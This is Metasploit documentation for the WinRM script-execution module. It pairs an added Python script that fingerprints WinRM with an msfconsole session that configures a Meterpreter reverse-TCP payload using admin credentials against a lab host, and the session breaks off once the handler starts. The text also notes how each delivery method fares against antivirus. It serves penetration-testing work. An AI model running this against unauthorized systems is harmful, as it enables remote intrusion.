metasploit-gs/documentation/modules/exploit/winrm/winrm_script_exec.md
2017-03-19 18:27:00 +05:30

Vulnerable Application

Windows Remote Management (WinRM) is Microsoft's implementation of the WS-Management protocol, a component of Windows (introduced with Windows Vista) that lets administrators run management scripts and commands on remote hosts. Remote connections are carried as SOAP (Simple Object Access Protocol) messages over HTTP (TCP 5985 by default) or HTTPS (TCP 5986). This module uses valid credentials to log in to the WinRM service and execute a payload. It has two payload delivery methods: PowerShell 2.0 and the VBS CmdStager. The module checks whether PowerShell 2.0 is available on the target and, if so, uses it; otherwise it falls back to the VBS CmdStager, which is less stealthy because it writes a VBScript dropper to disk and launches it through the command shell, making it more likely to be caught by antivirus. IMPORTANT: when targeting an x64 system with the PowerShell method, select an x64 payload; an x86 payload will never return a session, because the payload runs inside the 64-bit PowerShell process. [EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/
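Before pointing the module at a host, it is useful to confirm that the port really speaks WS-Management and to get a hint of which delivery method the module will end up choosing. The script below is an added example and is not part of this module or of Metasploit: it sends the DMTF WS-Man Identify request, which Windows answers without credentials when the WSMANIDENTIFY: unauthenticated header is present, parses the IdentifyResponse, and reads the WinRM stack version out of ProductVersion (the OS fields are zeroed on an unauthenticated Identify, the Stack field is not). The sample response and the heuristic that a 2.0 or newer stack, which shipped with WMF 2.0 alongside PowerShell 2.0, means the PowerShell method is likely to be selected are both assumptions of this example, and the sample XML is constructed rather than captured.

```python
"""WS-Management Identify pre-check for a WinRM target (added example, not Metasploit code)."""
import urllib.request
import xml.etree.ElementTree as ET

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
WSMID_NS = "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"
NS = {"s": SOAP_NS, "wsmid": WSMID_NS}


def identify_envelope() -> bytes:
    """Build the WS-Management Identify request body (DMTF wsmanidentity.xsd)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:wsmid="{WSMID_NS}">'
        "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
    ).encode("utf-8")


def parse_identify(xml_bytes: bytes) -> dict:
    """Extract vendor, protocol and WinRM stack version from an IdentifyResponse.

    Raises ValueError when the body is not a WS-Man IdentifyResponse
    (for example an error page from something else listening on the port).
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"not XML: {exc}") from exc
    resp = root.find("s:Body/wsmid:IdentifyResponse", NS)
    if resp is None:
        raise ValueError("no wsmid:IdentifyResponse in SOAP body")
    info = {}
    for tag in ("ProtocolVersion", "ProductVendor", "ProductVersion"):
        el = resp.find(f"wsmid:{tag}", NS)
        info[tag] = el.text.strip() if el is not None and el.text else None
    # Windows reports "OS: x.y.z SP: a.b Stack: M.N". On an unauthenticated
    # Identify the OS/SP fields are zeroed but the Stack (WinRM) version is real.
    info["stack_version"] = None
    product_version = info["ProductVersion"] or ""
    if "Stack:" in product_version:
        major_minor = product_version.split("Stack:", 1)[1].strip().split()[0]
        try:
            info["stack_version"] = tuple(int(x) for x in major_minor.split("."))
        except ValueError:
            pass  # unexpected format: leave stack_version as None
    return info


def powershell_method_likely(info: dict) -> bool:
    """Heuristic (assumption of this example): WinRM stack 2.0+ shipped with WMF 2.0,
    which bundles PowerShell 2.0, so the module's PowerShell delivery is probably
    available. Not a proof: PowerShell 2.0 can be installed on a 1.1 stack, and a
    hardened host may have removed it from a newer one.
    """
    stack = info.get("stack_version")
    return stack is not None and stack >= (2, 0)


def winrm_identify(host: str, port: int = 5985, use_ssl: bool = False, timeout: float = 5.0) -> dict:
    """POST an unauthenticated Identify to /wsman and parse the reply (network call, not exercised offline)."""
    scheme = "https" if use_ssl else "http"
    req = urllib.request.Request(
        f"{scheme}://{host}:{port}/wsman",
        data=identify_envelope(),
        method="POST",
        headers={
            "Content-Type": "application/soap+xml;charset=UTF-8",
            # Windows answers Identify without credentials only when this header is present.
            "WSMANIDENTIFY": "unauthenticated",
        },
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_identify(resp.read())


# Constructed sample of what a WinRM 2.0 host returns to an unauthenticated
# Identify (OS fields zeroed, Stack 2.0). Not captured from a real target.
SAMPLE_IDENTIFY_RESPONSE = (
    f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:wsmid="{WSMID_NS}"><s:Header/><s:Body>'
    "<wsmid:IdentifyResponse>"
    "<wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion>"
    "<wsmid:ProductVendor>Microsoft Corporation</wsmid:ProductVendor>"
    "<wsmid:ProductVersion>OS: 0.0.0 SP: 0.0 Stack: 2.0</wsmid:ProductVersion>"
    "</wsmid:IdentifyResponse></s:Body></s:Envelope>"
).encode("utf-8")


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    info = winrm_identify(target) if target else parse_identify(SAMPLE_IDENTIFY_RESPONSE)
    print(info)
    print("PowerShell delivery likely:", powershell_method_likely(info))
```

Run it with a host argument to query a live target, or with none to parse the constructed sample. The unauthenticated Identify never tells you whether the credentials you plan to use are valid or whether the account is allowed to use WinRM; it only confirms the listener and the stack version, so a non-XML or non-IdentifyResponse body is treated as "not WinRM" rather than guessed at.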

Example Usage

msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentication
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   admin            yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.198.130  yes       The target address
   RPORT      5985             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URI        /wsman           yes       The URI of the WinRM service
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.198.138  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



msf exploit(winrm_script_exec) > run
[*] Started reverse TCP handler on 192.168.198.138:4444